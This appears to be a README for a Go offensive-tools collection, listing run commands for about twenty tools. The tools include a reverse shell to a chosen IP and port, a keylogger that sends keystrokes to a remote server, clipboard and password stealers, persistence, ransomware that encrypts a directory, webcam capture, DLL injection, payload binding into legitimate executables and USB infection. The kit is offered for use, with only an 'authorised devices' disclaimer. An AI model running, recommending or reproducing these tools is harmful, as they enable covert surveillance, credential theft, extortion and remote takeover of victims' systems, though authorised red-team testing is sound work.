WIP
A collection of red-teaming attacking tools and payloads for Windows and Linux. Some of the scripts will be rougher than others in terms of output etc but I will be actively working on these and improving.
A simple reverse shell that connects to a specified IP and port.
go run reverse_shell/main.go <IP> <PORT>A simple keylogger for Linux.
go run keylogger/main.goThe keylogger currently supports only Linux.
A simple network scanner that scans a given IP range and port range.
go run network_scanner/main.go <IP_RANGE> <START_PORT> <END_PORT>Example:
go run network_scanner/main.go 192.168.1.1 20 80A tool to download files from a specified URL.
go run file_downloader/main.go <URL> <DEST>Example:
go run file_downloader/main.go http://example.com/file.txt /tmp/file.txtA tool to capture screenshots.
go run screenshot_capturer/main.goA tool to steal the contents of the clipboard.
go run clipboard_stealer/main.goA tool to steal saved passwords (WiFi passwords for Linux).
go run password_stealer/main.goA tool to establish persistence on the target system.
go run persistence/main.goA tool to forward traffic from one port to another.
go run port_forwarder/main.go <LOCAL_PORT> <REMOTE_HOST> <REMOTE_PORT>Example:
go run port_forwarder/main.go 8080 example.com 80A tool to gather detailed system information.
go run system_info_gatherer/main.goA tool to encrypt files in a specified directory using AES.
go run ransomware/main.go <DIRECTORY> <PASSWORD>Example:
go run ransomware/main.go /path/to/target_directory mypasswordA tool to capture images from the webcam.
go run webcam_capture/main.goDumps the memory of a specified process.
go run memory_dumper/main.go <PID>Securely deletes files to avoid recovery.
go run file_eraser/main.go <FILE_PATH>Injects a DLL into a running process.
go run process_injection/main.go <PID> <DLL_PATH>Binds a malicious payload to a legitimate executable.
go run file_binder/main.go <LEGITIMATE_EXE> <MALICIOUS_PAYLOAD> <OUTPUT_EXE>17. Keylogger with Network Exfiltration
< 8000 a id="user-content-17-keylogger-with-network-exfiltration" class="anchor" aria-label="Permalink: 17. Keylogger with Network Exfiltration" href="#17-keylogger-with-network-exfiltration">Sends logged keystrokes to a remote server.
go run keylogger_network/main.go <SERVER_IP> <SERVER_PORT>Detects if the tool is being debugged.
go run anti_debugging/main.goCaptures network packets on the local machine.
go run packet_sniffer/main.go <INTERFACE>Infects USB drives with a malicious payload.
go run usb_infection/main.go <PAYLOAD> <DRIVE_LETTER>Collects extensive system information.
go run system_recon/main.goEnsure all dependencies are up to date.
go get -u ./...All contributions are welcome to improving this collection.
This work is under MIT License - Only use on authorised devices.